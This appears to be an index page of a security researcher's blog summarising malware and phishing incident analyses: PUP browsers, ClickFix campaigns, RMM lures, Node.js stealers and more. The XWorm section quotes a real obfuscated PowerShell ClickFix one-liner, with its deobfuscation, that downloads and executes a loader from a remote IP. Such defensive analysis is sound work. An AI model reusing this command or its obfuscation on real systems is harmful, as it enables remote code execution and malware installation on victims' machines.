AceLauncher

AceLauncher is a Potentially Unwanted Program (PUP) similar to Wave Browser, OneStart, and OneLaunch. It’s a Chromium based browser that creates several tasks, AppData directories, and registry keys to maintain persistence on a device. While not overtly malicious, users will likely want to remove the browser as it does redirect and serve potentially malicious content. This includes functions that link to ManualsLib domains and references to Wave Browser and Recipe Lister. The browser also uses Yahoo’s Hosted Search platform to serve sponsored content driving revenue to the AceLauncher organization.

Phishing

I recently analyzed the following phishing email. It contains a Microsoft account harvester and has some interesting anti-analysis functions. I didn’t do a full dive on it, but there’s some interesting stuff here.

Examining the email in a text editor revealed that the headers had been manipulated.

The QR code image was extracted from the email via the Base64 encoded string object. This was put into CyberChef for rasterization and analysis.

LogMeIn Unattended Installer

A user received a phishing email that redirected the to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).

The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and executes a function that reaches out to a public CloudFlare R2 bucket that hosts the malicious RMM installer.

Fisher-Price Malware

With the rise of AI, Vibe-Coded malware is now an existing threat. Sort of? In the way that a wet noodle could potentially kill you in the right circumstances, Vibe-Coded malware could also pose a threat. It’s just very unlikely. At least, with the current iterations out there.

Enter what I’m calling “Baby’s first malware” AKA “Fisher-Price Malware”. A Vibe-Coded sample found on a users’ device. It’s an “obfuscated” PowerShell loader that pulls a payload that… takes screenshots and uploads them? Kind of? Technically, it works. Sometimes. In perfect conditions.

Slides from BSides TC 2025 talk.

Direct Link

Node Malware

Node.js is commonly used to deploy stealers on devices. Often, these incidents include WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malcious Node.js scripts on the host device. Also referred to as EvilAI - TrendMicro

The linked article does a great job of breaking these down. They’re essentially .net assemblies that use WebView2 and AI-generated “web applications” (read vibe-coded html pages). These applications are bundled into an InnoSetup installer with node and a malicious script. When the installer runs, it sets up a scheduled task to execute the node script. The user only sees the intended “legitimate” AI web app get installed.

ClickFix - NetSupport RAT

Incident Overview

On Saturday, Spetember 20th, 2025, A user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occured between the previous incidents and this current campaign.

Calendaromatic and Homoglyphs

I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.

The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to electron. It combines HTML, CSS, and JavaScript into a single webview 2 based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.

ClickFix - XWorm

NOTE: Quick and dirty upload of some notes from an XWorm sample.

Technical Analysis

The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.

The ClickFix domain copied the following code to the user’s clipboard:

POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"

# Deobfuscated

FUNCTION YES { 
    &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};

$FF='HSJDUFERIKFOLDJRKMOXSDH';

$DD=$FF[8]+$FF[7]+$FF[17]; #IRM

$SS=$FF[8]+$FF[6]+$FF[19]; #IEX

# IEX (IRM 77.83.207.225/x.jpg)

The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.

WSL Shenanigans

A fun thing about WSL 2, is that it is fully capable of calling windows native functions and binaries. It also has cron. Which opens the opportunity to do some interesting things to someone’s unattended device.

Take this MSHTA execution for example. It’s a simple SAPI call made in JavaSCript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straight forward way to do this.